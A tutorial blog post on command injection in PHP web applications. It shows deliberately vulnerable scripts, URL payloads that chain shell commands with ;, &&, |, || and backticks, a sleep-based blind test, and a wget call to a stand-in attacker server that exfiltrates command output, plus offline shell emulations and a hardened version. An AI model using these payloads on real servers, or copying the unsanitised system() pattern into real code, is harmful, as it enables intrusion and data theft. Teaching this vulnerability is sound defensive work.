Command Injection vulnerability in Web Applications : Part 1 | Introduction

The Command Injection vulnerability allows an attacker to execute system-level commands on the vulnerable web server. It occurs when an application passes unsafe user-supplied data (for example from GET/POST parameters, cookies, HTTP headers etc.) without any sanitization or proper security checks to shell command execution functions like system(), shell_exec() etc. These functions hand the whole string to the system shell, and the shell interprets any metacharacters (';', '&&', '|', backticks and so on) in the user-supplied part, so it executes whatever command the attacker appended.

This vulnerability can lead to various consequences, for example complete takeover of the server, theft of sensitive data, launching Denial of Service attacks etc. Now let's see an example of a command injection vulnerability.

Filename : test.php
  <?php
  if (empty($_GET['file'])) {
    echo "Please give the file name !!";
    exit;
  }
  $file = $_GET['file'];
  // $file goes into the command string unchanged, so any shell
  // metacharacters in it are interpreted by the shell (the vulnerability).
  system("wc -c $file");
  echo " Bytes";
The above PHP code prints the size in bytes of the given file name. Note that the system() function is used to execute the system command, and that there is a file named data.txt on the web server.

Output :

Requesting /test.php?file=data.txt prints the size of data.txt in bytes, as expected. But an attacker can also pass other shell commands in the 'file' parameter, and because there is no check of any kind on the user-supplied data, system() will execute them. For example :
 /test.php?file=data.txt;ls

Here the value of the 'file' parameter is "data.txt;ls", where ls is the list command and ';' (semicolon) is the shell's command separator: it ends the wc command and starts a new one, so ls runs as a separate command and its output (the directory listing) comes back in the response together with the byte count. Another example :
 /test.php?file=data.txt;uname -a

We can also use some other shell metacharacters :

'&&' : The second command runs only if the first one succeeds. Example :
 /test.php?file=data.txt && uname
'|' (pipe) : The output of the first command becomes the input of the second one; the second command runs whether or not the first one succeeds. Example :
 /test.php?file=data.txt | uname
'||' : The second command runs only if the first one fails, so the file name has to be one that makes wc fail. Example :
 /test.php?file=filenotexists || uname
'`' (backtick) : Anything between backticks is executed first and its output is substituted into the command line, so here uname runs and its output becomes an extra argument to wc. The "$(command)" form does the same thing. Example :
 /test.php?file=data.txt `uname`

Note that when these payloads are sent in a URL, '&' and space have a special meaning in the query string: a raw '&' starts a new parameter, so '&&', '|' and spaces must be URL-encoded ('%26%26', '%7C', '%20') for the whole payload to reach the 'file' parameter.
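
To see exactly how the shell parses each of these separators, here is an added example (my own, not code from the original post) that emulates what PHP's system("wc -c $file") does: PHP hands the interpolated string to /bin/sh -c, so the vulnerable function below does the same with the raw parameter, next to a hardened version that passes the value as a single argument (what escapeshellarg() achieves in PHP). The data.txt file, the working directory and the marker files are constructed by the script; "touch marker" stands in for ls/uname so that whether the injected command ran is visible as a file rather than as text.

```shell
#!/bin/sh
# Added example, not code from the original post. Emulates PHP's
# system("wc -c $file"): the interpolated string goes to /bin/sh -c.

# Constructed working directory and data.txt standing in for the server's file.
WORKDIR=$(mktemp -d)
printf 'hello world\n' > "$WORKDIR/data.txt"   # 12 bytes
cd "$WORKDIR" || exit 1

# Vulnerable: the parameter is interpolated into the command line, exactly as
# system("wc -c $file") does, and the shell interprets ; && | || ` $( ).
vulnerable_wc() {
    sh -c "wc -c $1" 2>&1 || :
}

# Hardened: the parameter is one argv element (the effect of escapeshellarg()
# in PHP). Metacharacters are just characters of a file name, so wc fails with
# "No such file" instead of running a second command. "--" stops a value that
# starts with "-" from being read as an option.
safe_wc() {
    wc -c -- "$1" 2>&1 || :
}

# Run one payload through both paths and report "hit" or "miss" for each:
# "hit" means the payload created the marker file, i.e. the injected command ran.
demo() {
    payload=$1
    marker=$2
    rm -f "$marker"
    vulnerable_wc "$payload" >/dev/null
    if [ -e "$marker" ]; then vuln=hit; else vuln=miss; fi
    rm -f "$marker"
    safe_wc "$payload" >/dev/null
    if [ -e "$marker" ]; then safe=hit; else safe=miss; fi
    echo "$vuln $safe"
}

# The separators from the post, with "touch marker" in place of ls/uname.
# Every payload but the last prints "hit miss"; 'data.txt || touch marker'
# prints "miss miss" because wc succeeds and || never fires.
for payload in 'data.txt;touch marker' 'data.txt && touch marker' \
               'data.txt | touch marker' 'filenotexists || touch marker' \
               'data.txt `touch marker`' 'data.txt $(touch marker)' \
               'data.txt || touch marker'; do
    printf '%-32s -> %s\n' "$payload" "$(demo "$payload" marker)"
done
```

Run it with sh. The last line of output is the reason the page's '||' example uses a non-existent file name: a separator that only changes control flow still depends on how the first command behaves.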

Types of Command Injection :

1. Generic Command Injection : The output of the executed command is returned in the response. The example above is generic command injection.

2. Blind Command Injection : The output of the executed command is not returned in the response, so the attacker has to infer whether the command ran from a side effect such as a time delay or an outbound request. Now let's see another example to understand blind command injection.

Filename : bci.php
  <?php
  if (empty($_GET['file'])) {
    echo "Please give the file name !!";
    exit;
  }
  $file = $_GET['file'];
  // shell_exec() returns the command's output as a string; it is discarded
  // here, so nothing an injected command prints reaches the response.
  shell_exec("rm $file");
  echo "$file is removed.";
The above PHP code deletes the user-supplied file name from the web directory. Also note that shell_exec() is used instead of system(): shell_exec() returns the command's output as a string instead of printing it, and since this script discards the return value, nothing the command prints reaches the response page. Now let's run the above example :

and when we put a shell command in the parameter, for example 'data.txt;ls', the response shows nothing related to the 'ls' command.

This type of command injection is known as blind command injection, because we do not see the output of the executed command in the response. In this situation we can use commands whose effect is observable without any output, like 'sleep', which pauses execution for the given number of seconds. Example :
 /bci.php?file=data.txt;sleep 10

If the web app now waits about 10 seconds for the server response, the injected sleep ran, which means the parameter is vulnerable to command injection (repeat with a different delay to rule out a server that is simply slow). In this situation, to exfiltrate data from the server we can make the vulnerable server send a request to a server we control, with the data embedded in the URL. Example :
 /bci.php?file=data.txt;wget http://attackerserver/$(command_to_be_executed)

Note that above the "$(command)" wrapper (command substitution) is used: the server's shell runs the command first and substitutes its output into the URL, so the output shows up as the requested path in the attacker server's logs.
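
The timing oracle and the $(command) exfiltration just described, as an added example (my own, not code from the original post) that runs offline: blind_rm() emulates bci.php's shell_exec("rm $file") with all output discarded, timing_oracle() measures the sleep-based delay, and a constructed fake wget placed first on PATH writes each requested URL to a local file in place of the attacker's web-server access log. The hostname attackerserver and the choice of `id -un` as the command whose output is exfiltrated are assumptions for the demonstration.

```shell
#!/bin/sh
# Added example, not code from the original post. Emulates bci.php's
# shell_exec("rm $file") and confirms the blind injection two ways.

# Constructed working directory; no real attacker server is contacted.
WORKDIR=$(mktemp -d)
cd "$WORKDIR" || exit 1
ATTACKER_LOG="$WORKDIR/attacker.log"
export ATTACKER_LOG

# Constructed stand-in for wget: records the requested URL instead of
# fetching it, the way the attacker's HTTP access log would.
mkdir -p bin
cat > bin/wget <<'EOF'
#!/bin/sh
printf '%s\n' "$1" >> "$ATTACKER_LOG"
EOF
chmod +x bin/wget
PATH="$WORKDIR/bin:$PATH"
export PATH

# The blind endpoint: interpolates the parameter into "rm ..." and hands it
# to sh -c, exactly like shell_exec("rm $file"); stdout and stderr are dropped.
blind_rm() {
    : > data.txt                        # recreate the file the page deletes
    sh -c "rm $1" >/dev/null 2>&1 || :
}

# Wall-clock seconds taken by one request (whole seconds are enough here).
elapsed_seconds() {
    start=$(date +%s)
    blind_rm "$1"
    end=$(date +%s)
    echo $((end - start))
}

# Timing oracle: a plain request must return quickly, while one with
# ";sleep N" appended must take at least N seconds. Checking both sides
# guards against reading a slow server as a positive.
timing_oracle() {
    delay=$1
    baseline=$(elapsed_seconds 'data.txt')
    injected=$(elapsed_seconds "data.txt;sleep $delay")
    if [ "$injected" -ge "$delay" ] && [ "$baseline" -lt "$delay" ]; then
        echo vulnerable
    else
        echo "no delay"
    fi
}

# Out-of-band exfiltration: single quotes keep $(id -un) intact so it is
# the server's shell, not ours, that expands it before wget runs. The
# command output therefore travels in the URL path.
exfiltrate() {
    blind_rm 'data.txt;wget http://attackerserver/$(id -un)'
}

# What the attacker sees: the path component of the latest logged request.
exfiltrated() {
    tail -n 1 "$ATTACKER_LOG" | sed 's#^http://attackerserver/##'
}

printf 'timing oracle (sleep 2): %s\n' "$(timing_oracle 2)"
exfiltrate
printf 'exfiltrated via URL path: %s\n' "$(exfiltrated)"
```

In a real request the space before wget has to be URL-encoded ('%20'); the exfiltrated value then appears verbatim as the request path in your server's access log, and the same $(...) trick works with curl when wget is not installed on the target.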

Conclusion :

This is a very basic introduction to the Command Injection vulnerability. In the next post we are going to see some methods and techniques to bypass security checks and sanitization.

Link : Command Injection Part 2 | Bypass Security checks
